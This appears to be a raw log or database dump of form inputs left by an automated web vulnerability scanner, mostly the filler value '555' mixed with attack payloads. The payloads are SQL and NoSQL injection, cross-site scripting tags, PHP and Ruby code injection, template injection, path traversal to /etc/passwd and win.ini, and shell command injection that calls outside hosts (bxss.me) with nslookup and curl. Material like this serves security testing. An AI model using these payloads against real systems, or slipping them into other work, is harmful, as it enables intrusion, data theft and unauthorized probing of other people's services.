{"information_schema where (select 0) or sleep(30) /*iBzyyO5o*/; -- .user"=>{"1"=>"1"}}
555
555
555
555
place_review/.
555
555
555
555
555
555
{"inline"=>"<%=`nslookup @`%>"}
{"information_schema where (select 0) or sleep(30) /*iBzyyO5o*/; -- .user"=>{"1"=>"1"}}
"+"A".concat(70-3).concat(22*4).concat(118).concat(80).concat(102).concat(81)+(require"socket" Socket.gethostbyname("hitni"+"iqbcvyqsfcbc0.bxss.me.")[3].to_s)+"
555
555
555
555
555
555
555
555
'+'A'.concat(70-3).concat(22*4).concat(100).concat(66).concat(115).concat(65)+(require'socket' Socket.gethostbyname('hitxt'+'jjdkymyo15952.bxss.me.')[3].to_s)+'
555
555
555
555
555
555
555
555
555'"()&%<zzz><ScRiPt >dFtN(9345)</ScRiPt>
555
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
555
555
555
{"$testing"=>"1"}
555
555
-1 OR 2+568-568-1=0+0+0+1 --
555'&&sleep(27*1000)*sbwahd&&'
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
555
555'||sleep(27*1000)*lftein||'
'"()&%<zzz><ScRiPt >9jPE(9577)</ScRiPt>
-1" OR 2+344-344-1=0+0+0+1 --
555
${@print(md5(31337))}\
555
'"()
555'"
bfg6874<s1﹥s2ʺs3ʹhjl6874
555"&&sleep(27*1000)*qjjyfz&&"
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
<th:t="${dfb}#foreach
555
555
555
555
555
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9942'>
555
555
555
'"
555
555
555
";print(md5(31337));$a="
{"information_schema where (select 0) or sleep(30) /*RKhfKRuQ*/; -- .user"=>{"1"=>"1"}}
'.gethostbyname(lc('hitxa'.'cjggejhtf33bf.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(101).chr(83).chr(104).chr(88).'
<!--
555
555
{"$eq"=>"555"}
555
".gethostbyname(lc("hitrq"."trswebgxdcea4.bxss.me."))."A".chr(67).chr(hex("58")).chr(122).chr(85).chr(100).chr(84)."
555
555
{"$ne"=>"555"}
${@print(md5(31337))}\
{"inline"=>"<%=`nslookup @`%>"}
555
555
{"$testing"=>"1"}
-1 OR 2+538-538-1=0+0+0+1
';print(md5(31337));$a='
";print(md5(31337));$a="
555
555
555
555'&&sleep(27*1000)*zyzgpx&&'
555
555'||sleep(27*1000)*ioefaz||'
555
555
555
555
<%={{={@{#{${dfb}}%>
555
555
555
555
555
555
555
555
555
555
555
555-1 waitfor delay '0:0:15' --
';print(md5(31337));$a='
555
555
555
555
'"()
555'"()&%<zzz><ScRiPt >9jPE(9358)</ScRiPt>
'.print(md5(31337)).'
555<body onload=8XaG(9357)>
555
555
555
555
-1' OR 2+919-919-1=0+0+0+1 --
'.gethostbyname(lc('hitit'.'bfffeanxdde85.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(110).chr(71).chr(104).chr(75).'
555
-1' OR 2+380-380-1=0+0+0+1 or '67YdX6zD'='
555"||sleep(27*1000)*viibfa||"
555
555
'.print(md5(31337)).'
@@RttQZ
555
555
555
5559945652
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
${@print(md5(31337))}
{"information_schema where (select 0) or sleep(30) /*RKhfKRuQ*/; -- .user"=>{"1"=>"1"}}
555
555
555
'"()&%<zzz><ScRiPt >dFtN(9992)</ScRiPt>
555
555
555
555
555"&&sleep(27*1000)*xmmliz&&"
555
5559671733
555
555
{"$eq"=>"555"}
555<img src=//xss.bxss.me/t/dot.gif onload=8XaG(9452)>
${@print(md5(31337))}
555
".gethostbyname(lc("hitcr"."uullcjpp898f3.bxss.me."))."A".chr(67).chr(hex("58")).chr(116).chr(86).chr(103).chr(79)."
{"$nin"=>["555"]}
555
555"||sleep(27*1000)*jmvfri||"
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555xKDXCoUK'; waitfor delay '0:0:4' --
555
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
-1 OR 2+143-143-1=0+0+0+1 --
-1 OR 2+476-476-1=0+0+0+1
555
555
555
555
555xvTddlcA
555
555
555AxaB9Q91
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
-1 OR 2+432-432-1=0+0+0+1 --
555
555
555
555
555
555
555
555
555
-1 OR 2+257-257-1=0+0+0+1
-1' OR 2+178-178-1=0+0+0+1 --
-1" OR 3+176-176-1=0+0+0+1 --
-1" OR 3*2>(0+5+561-561) --
555
555*if(now()=sysdate(),sleep(15),0)
555<ScRiPt >dFtN(9385)</ScRiPt>
)
555
Http://bxss.me/t/fit.txt
!(()&&!|*|*|
555
&echo uxfqiu$()\ ovkyaw\nz^xyu||a #' &echo uxfqiu$()\ ovkyaw\nz^xyu||a #|" &echo uxfqiu$()\ ovkyaw\nz^xyu||a #
555
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
555
["555"]
555
555
555
555
&(nslookup -q=cname hitnofhefwzwy23537.bxss.me||curl hitnofhefwzwy23537.bxss.me)&'\"`0&(nslookup -q=cname hitnofhefwzwy23537.bxss.me||curl hitnofhefwzwy23537.bxss.me)&`'
555
555
555
555
-1' OR 3+139-139-1=0+0+0+1 --
-1' OR 2+863-863-1=0+0+0+1 or 'vsHTthcg'='
555
555
55586eKhzpd'; waitfor delay '0:0:8' --
555
555
555
555<esi:include src="http://bxss.me/rpb.png"/>
555
5559798104
555
'+response.write(9744914*9345636)+'
(nslookup -q=cname hiteqzhhmpfzt1c51b.bxss.me||curl hiteqzhhmpfzt1c51b.bxss.me))
"+response.write(9744914*9345636)+"
555
$(nslookup -q=cname hitlakrkbyijr673f1.bxss.me||curl hitlakrkbyijr673f1.bxss.me)
555
555
555
555
555
555
555
555
|(nslookup -q=cname hithpscysmskgddf96.bxss.me||curl hithpscysmskgddf96.bxss.me)
555
555
555
555
xfs.bxss.me
555
555
555
555
555
'.gethostbyname(lc('hitgz'.'iwfzikae00027.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(121).chr(78).chr(105).chr(73).'
555
555
".gethostbyname(lc("hiteh"."yzqxqoddb38f6.bxss.me."))."A".chr(67).chr(hex("58")).chr(110).chr(68).chr(97).chr(68)."
{"$in"=>["555"]}
555
555
{"$ne"=>"555"}
555
555
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
555
'"()&%<zzz><ScRiPt >U2aZ(9111)</ScRiPt>
-1" OR 3*2<(0+5+561-561) --
-1" OR 3*2>(0+5+176-176) --
555
555
555
555
555*if(now()=sysdate(),sleep(15),0)
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
${9999968+9999854}
/etc/shells
../../../../../../../../../../../../../../windows/win.ini
555
response.write(9744914*9345636)
555
../555
555
555|echo bocneo$()\ iiusoa\nz^xyu||a #' |echo bocneo$()\ iiusoa\nz^xyu||a #|" |echo bocneo$()\ iiusoa\nz^xyu||a #
555
555-1) OR 822=(SELECT 822 FROM PG_SLEEP(15))--
555
555
555
555
555
555
555
555
{"information_schema where (select 0) or sleep(30) /*rkpsacW0*/; -- .user"=>{"1"=>"1"}}
555
555
'.print(md5(31337)).'
555
555
555
555
555
555
555
555
555
555
555
-1' OR 2+619-619-1=0+0+0+1 or 'd7hriJlf'='
-1" OR 3+561-561-1=0+0+0+1 --
-1" OR 3*2<(0+5+176-176) --
dfb{{98991*97996}}xca
555
555
555
dfb[[${98991*97996}]]xca
555
555
dfb__${98991*97996}__::.x
555-1 OR 420=(SELECT 420 FROM PG_SLEEP(15))--
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
555
http://bxss.me/t/fit.txt?.jpg
../../../../../../../../../../../../../../etc/passwd
c:/windows/win.ini
file:///etc/passwd
555
555&echo orvkxh$()\ ismydo\nz^xyu||a #' &echo orvkxh$()\ ismydo\nz^xyu||a #|" &echo orvkxh$()\ ismydo\nz^xyu||a #
bxss.me
555
555
|echo kwsxqc$()\ ytztgm\nz^xyu||a #' |echo kwsxqc$()\ ytztgm\nz^xyu||a #|" |echo kwsxqc$()\ ytztgm\nz^xyu||a #
555
&nslookup -q=cname hitmquksszzsuc0988.bxss.me&'\"`0&nslookup -q=cname hitmquksszzsuc0988.bxss.me&`'
555
'"
555
555
<!--
555
{"inline"=>"<%=`nslookup @`%>"}
555
{"information_schema where (select 0) or sleep(30) /*rkpsacW0*/; -- .user"=>{"1"=>"1"}}
555
555
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
{"$testing"=>"1"}
';print(md5(31337));$a='
555
555
";print(md5(31337));$a="
{"$eq"=>"555"}
${@print(md5(31337))}
${@print(md5(31337))}\
'"()
555
HttP://bxss.me/t/xss.html?%00
`(nslookup -q=cname hitxrltdkdtpm47ae3.bxss.me||curl hitxrltdkdtpm47ae3.bxss.me)`
bxss.me/t/xss.html?%00
;(nslookup -q=cname hitsqzxuwvcub783c2.bxss.me||curl hitsqzxuwvcub783c2.bxss.me)|(nslookup -q=cname hitsqzxuwvcub783c2.bxss.me||curl hitsqzxuwvcub783c2.bxss.me)&(nslookup -q=cname hitsqzxuwvcub783c2.bxss.me||curl hitsqzxuwvcub783c2.bxss.me)
555
555
555
555
555
555
555
555
place_review
555
555
555
555
555
555
555
"+"A".concat(70-3).concat(22*4).concat(104).concat(77).concat(101).concat(83)+(require"socket" Socket.gethostbyname("hitkx"+"vnufvelx10a29.bxss.me.")[3].to_s)+"
place_review/.
555
'+'A'.concat(70-3).concat(22*4).concat(111).concat(65).concat(120).concat(81)+(require'socket' Socket.gethostbyname('hitpg'+'hyynxhvv76d3e.bxss.me.')[3].to_s)+'
555
555
555
555
555
555
555
555
555
555'"()&%<zzz><ScRiPt >U2aZ(9102)</ScRiPt>
555
555
555"&&sleep(27*1000)*aapklk&&"
555
555
555
555
555
555
555
bfg9459<s1﹥s2ʺs3ʹhjl9459
555
555
555
555
555
<%={{={@{#{${dfb}}%>
<th:t="${dfb}#foreach
555
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
555'&&sleep(27*1000)*iuzhvr&&'
555
555
555
555
555-1)) OR 328=(SELECT 328 FROM PG_SLEEP(15))--
555
555
555
555
555
555
555
5559609013
555
555
555
555
555
555
555
555
555TdDZEMtk
555
-1' OR 2+615-615-1=0+0+0+1 --
dfb{{98991*97996}}xca
555'||sleep(27*1000)*fpsrly||'
555
555"||sleep(27*1000)*zzayrm||"
555
555
555
555
555
555
555
555
555
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555GLsmfA7U' OR 515=(SELECT 515 FROM PG_SLEEP(15))--
555vA0Yekjp') OR 726=(SELECT 726 FROM PG_SLEEP(15))--
-1" OR 2+390-390-1=0+0+0+1 --
555-1; waitfor delay '0:0:15' --
555
-1 OR 2+516-516-1=0+0+0+1 --
-1 OR 2+75-75-1=0+0+0+1
-1' OR 2+81-81-1=0+0+0+1 or 'viFUP7jS'='
555-1); waitfor delay '0:0:15' --
555
555rWscjf9u')) OR 118=(SELECT 118 FROM PG_SLEEP(15))--
555*if(now()=sysdate(),sleep(15),0)
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
555-1 waitfor delay '0:0:15' --
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
555Tykfok7I'; waitfor delay '0:0:15' --
555<ScRiPt >U2aZ(9205)</ScRiPt>
555<WCCSFK>GX8KI[!+!]</WCCSFK>
555<script>U2aZ(9559)</script>